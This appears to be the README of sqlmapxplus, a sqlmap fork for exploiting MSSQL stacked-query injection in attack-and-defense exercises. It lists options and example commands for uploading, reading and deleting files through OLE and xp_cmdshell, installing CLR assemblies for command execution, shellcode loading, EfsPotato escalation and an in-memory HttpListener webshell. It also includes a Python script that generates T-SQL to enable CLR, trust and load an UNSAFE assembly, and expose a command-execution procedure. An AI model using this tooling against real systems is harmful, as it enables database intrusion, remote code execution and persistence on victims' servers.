In many regional attack-and-defense exercises, SQL Server stacked-query injection still turns up with high frequency. However, common exercise constraints such as no outbound network access, low privileges, the web site and the database on separate hosts, endpoint protection, difficulty in getting a C2 connection out, and cumbersome persistence mean that a single --os-shell no longer meets our needs.
sqlmapxplus is based on sqlmap. It reopens this classic database exploitation tool, draws on a number of existing solutions, and adds MSSQL-specific exploitation methods for injection. Part of the secondary development is complete, including file upload via OLE and automated shellcode loading.
20240508 update notes: added enabling OLE; added reading, moving, copying and deleting a specified file; added checking whether a specified file exists; added a stored procedure query function; added a stored procedure deletion function; changed the OLE upload method; changed the CLR installation process; changed the CLR command execution method; removed errors caused by Chinese comments.
On CLR installation failures caused by DLL transfer loss over a real network (temporary solution): the CLR DLL used by the original --install-clr is too large, and in practice it takes a large number of injection requests to deliver. If any one of those requests fails, the DLL does not land intact on the target and cannot be loaded. The original one-click automatic installation has therefore been removed; the user now chooses which DLL to install according to the actual target. Two options were added as a stop-gap: --check-file determines whether the DLL file has actually landed on the target host, and --check-clr determines whether the user-defined function has been loaded successfully in the database.
Why does the DLL grow during upload? The file is converted to hexadecimal for transfer and restored on the target, which doubles its size: a single byte such as the letter A becomes the two hex characters 41.
Custom CLR (completed): --install-clr now requires the path of a custom clr.dll, and the user-defined class name and method name are entered at the prompt. In --clr-shell mode, execution of the CLR function has been changed so that the entered command is passed to the user-defined function as a parameter (completed).
File system access:
- --xp-upload: upload a file via xp_cmdshell
- --ole-upload: upload a file via OLE
- --check-file: check whether a file exists using xp_fileexist
- --ole-del: delete a file via OLE
- --ole-read: read a file's contents via OLE
- --ole-move: move a file via OLE
- --ole-copy: copy a file via OLE

Operating system access:
- --enable-clr: enable CLR
- --disable-clr: disable CLR
- --enable-ole: enable OLE
- --check-clr: check for the user-defined function in the database
- --del-clr: delete the user-defined function from the database
- --install-clr: install CLR
- --clr-shell: CLR shell
- --sharpshell-upload1: SharpShell upload method 1 (via xp_cmdshell)
- --sharpshell-upload2: SharpShell upload method 2 (via OLE)
About OLE:
```
# Enable OLE exploitation
python sqlmap.py -r/-u xxx --enable-ole
# Upload a file via OLE
python sqlmap.py -r/-u xxx --ole-upload local_file_path --file-dest remote_file_path
# Delete the specified file via OLE
python sqlmap.py -r/-u xxx --ole-del remote_file_path
# Read the specified file via OLE
python sqlmap.py -r/-u xxx --ole-read remote_file_path
# Move and rename a file via OLE
python sqlmap.py -r/-u xxx --ole-move remote_file_path1 --file-dest remote_file_path
# Copy a file via OLE
python sqlmap.py -r/-u xxx --ole-copy remote_file_path1 --file-dest remote_file_path2
# HttpListener in-memory shell upload implemented via OLE
# Uploads to C:\Windows\Tasks\listen.tmp.txt by default; must run with SYSTEM privileges
python sqlmap.py -r/-u xxx --sharpshell-upload2
```
Other functions:
```
# Upload a file via xp_cmdshell
python sqlmap.py -r/-u xxx --xp-upload local_file_path --file-dest remote_file_path
# Use xp_fileexist to check whether a file exists
python sqlmap.py -r/-u xxx --check-file remote_file_path
# Query whether the user-defined function exists in the database
python sqlmap.py -r/-u xxx --check-clr clr_function_name
# Delete the user-defined function
python sqlmap.py -r/-u xxx --del-clr clr_function_name
# HttpListener in-memory shell upload implemented via xp_cmdshell
# Uploads to C:\Windows\Tasks\listen.tmp.txt by default; must run with SYSTEM privileges
python sqlmap.py -r/-u xxx --sharpshell-upload1
```
About CLR:
```
# Enable CLR exploitation
python sqlmap.py -r/-u xxx --enable-clr
# Disable CLR exploitation
python sqlmap.py -r/-u xxx --disable-clr
# Enter CLR installation mode
python sqlmap.py -r/-u xxx --install-clr
# Enter the interactive clr-shell command mode
python sqlmap.py -r/-u xxx --clr-shell
# Reference CLR DLLs are listed below; for other DLLs see the Knowledge Planet
# The stored procedure class name is Xplus; the stored procedure method names are
# case-sensitive: ClrExec, ClrEfsPotato, ClrDownload, ClrShellcodeLoader
# The corresponding single-function DLLs in the project directory are
# clrexec.dll, clrefspotato.dll, clrdownload.dll, clrshellcodeloader.dll
```
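The two points made above, that a hex-encoded upload doubles the transfer and has to be verified before CREATE ASSEMBLY is attempted, and that the CLR procedure is bound to a class name and a case-sensitive method name, can be seen end to end in the following added example. It is not sqlmapxplus code and does not reproduce how the tool builds its requests: it plans the chunked transfer, shows what a lost chunk does to the landed file, and generates the plain T-SQL that installs, checks and removes a CLR stored procedure. The assembly name "xplus", the 1000-hex-digit chunk size, the file path and the sample DLL bytes are assumptions chosen for illustration; "Xplus" and "ClrExec" are the names the README gives.

```python
# Added example (not sqlmapxplus code): hex-chunked upload planning, landing
# verification and T-SQL generation for a CLR stored procedure on MSSQL.
# Assumed for illustration: assembly name "xplus", chunk size, sample bytes.
import hashlib
from typing import List, Optional


def hex_chunks(data: bytes, chunk_hex_len: int = 1000) -> List[str]:
    """Hex-encode a file as an injection-based upload must, then split it into
    pieces, one per injected request. One byte becomes two hex digits, so the
    transfer is exactly twice the file size; the request count is what makes a
    large DLL fragile to deliver."""
    if chunk_hex_len <= 0 or chunk_hex_len % 2:
        raise ValueError("chunk length must be a positive, even number of hex digits")
    hexstr = data.hex().upper()
    return [hexstr[i:i + chunk_hex_len] for i in range(0, len(hexstr), chunk_hex_len)]


def reassemble(chunks: List[str]) -> bytes:
    """What the target ends up with: the received chunks concatenated and decoded."""
    return bytes.fromhex("".join(chunks))


def landing_report(local: bytes, landed: bytes) -> dict:
    """Compare the file that was sent with the bytes that landed. A chunk lost
    in transit shows up as a size and SHA-256 mismatch, which is why existence
    alone (xp_fileexist) is not enough before trying CREATE ASSEMBLY."""
    return {
        "expected_size": len(local),
        "landed_size": len(landed),
        "expected_sha256": hashlib.sha256(local).hexdigest(),
        "landed_sha256": hashlib.sha256(landed).hexdigest(),
        "ok": local == landed,
    }


def _q(s: str) -> str:
    """Escape a value for a single-quoted T-SQL literal."""
    return s.replace("'", "''")


def tsql_check_file(remote_path: str) -> List[str]:
    """T-SQL to run through the injection point after an upload: xp_fileexist
    answers whether the file is there; certutil (shipped with Windows) yields a
    SHA-256 to compare with landing_report()'s expected digest."""
    return [
        f"EXEC master..xp_fileexist '{_q(remote_path)}'",
        f"EXEC master..xp_cmdshell 'certutil -hashfile \"{_q(remote_path)}\" SHA256'",
    ]


def tsql_clr_install(assembly: str, class_name: str, method: str, dll: bytes,
                     proc_name: Optional[str] = None, trust: bool = True) -> List[str]:
    """Enable CLR, load the DLL from a hex literal and expose one method as a
    stored procedure taking a single string argument (the command is passed in
    as a parameter). On SQL Server 2017+ 'clr strict security' rejects unsigned
    assemblies; sp_add_trusted_assembly with the assembly's SHA-512 is the
    supported way past it, emitted when trust=True (absent on older versions)."""
    proc = proc_name or method
    stmts = [
        "EXEC sp_configure 'show advanced options', 1; RECONFIGURE;",
        "EXEC sp_configure 'clr enabled', 1; RECONFIGURE;",
    ]
    if trust:
        sha512 = hashlib.sha512(dll).hexdigest().upper()
        stmts.append(f"EXEC sp_add_trusted_assembly @hash = 0x{sha512}, "
                     f"@description = N'{_q(assembly)}';")
    stmts.append(f"CREATE ASSEMBLY [{assembly}] FROM 0x{dll.hex().upper()} "
                 "WITH PERMISSION_SET = UNSAFE;")
    stmts.append(f"CREATE PROCEDURE [dbo].[{proc}] @cmd NVARCHAR(MAX) "
                 f"AS EXTERNAL NAME [{assembly}].[{class_name}].[{method}];")
    return stmts


def tsql_clr_check(proc_name: str) -> str:
    """Is the CLR procedure (object type 'PC') present, and which
    assembly/class/method does it bind to?"""
    return ("SELECT o.name, a.name AS assembly_name, m.assembly_class, "
            "m.assembly_method, a.permission_set_desc FROM sys.objects o "
            "JOIN sys.assembly_modules m ON m.object_id = o.object_id "
            "JOIN sys.assemblies a ON a.assembly_id = m.assembly_id "
            f"WHERE o.type = 'PC' AND o.name = '{_q(proc_name)}';")


def tsql_clr_remove(proc_name: str, assembly: str) -> List[str]:
    """Cleanup in dependency order: the procedure must go before the assembly."""
    return [f"DROP PROCEDURE [dbo].[{proc_name}];", f"DROP ASSEMBLY [{assembly}];"]


if __name__ == "__main__":
    sample_dll = bytes(range(256)) * 8  # constructed stand-in, not a real assembly
    chunks = hex_chunks(sample_dll)
    print(f"{len(sample_dll)} bytes -> {len(chunks)} requests of up to 1000 hex digits")
    # Simulate one chunk lost in transit; the landing check catches it.
    print(landing_report(sample_dll, reassemble(chunks[:2] + chunks[3:])))
    for stmt in tsql_check_file(r"C:\Windows\Tasks\clrexec.dll"):
        print(stmt)
    for stmt in tsql_clr_install("xplus", "Xplus", "ClrExec", sample_dll):
        print(stmt[:120])
    print(tsql_clr_check("ClrExec"))
    print(*tsql_clr_remove("ClrExec", "xplus"), sep="\n")
```

The hash check is the step worth keeping: a DLL that is present but short by one chunk passes xp_fileexist and only fails later, at CREATE ASSEMBLY, with an error that gives no hint about the transfer. Comparing certutil's digest with the local one before installing tells the two failures apart.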
Public account: Cyber War
Knowledge Planet: Penetration Testing Guide
Reference link for the old version: https://mp.weixin.qq.com/s/nTYPKnl9XQLWhZ43sQV3xw
Reference link for the new version: https://mp.weixin.qq.com/s/6RpxXitEPt8rA1DFb56Oxw
https://github.com/sqlmapproject/sqlmap
https://github.com/uknowsec/SharpSQLTools
https://github.com/Anion3r/MSSQLProxy
https://mp.weixin.qq.com/s/X0cI85DdB17Wve2qzCRDbg
https://yzddmr6.com/posts/asp-net-memory-shell-httplistener/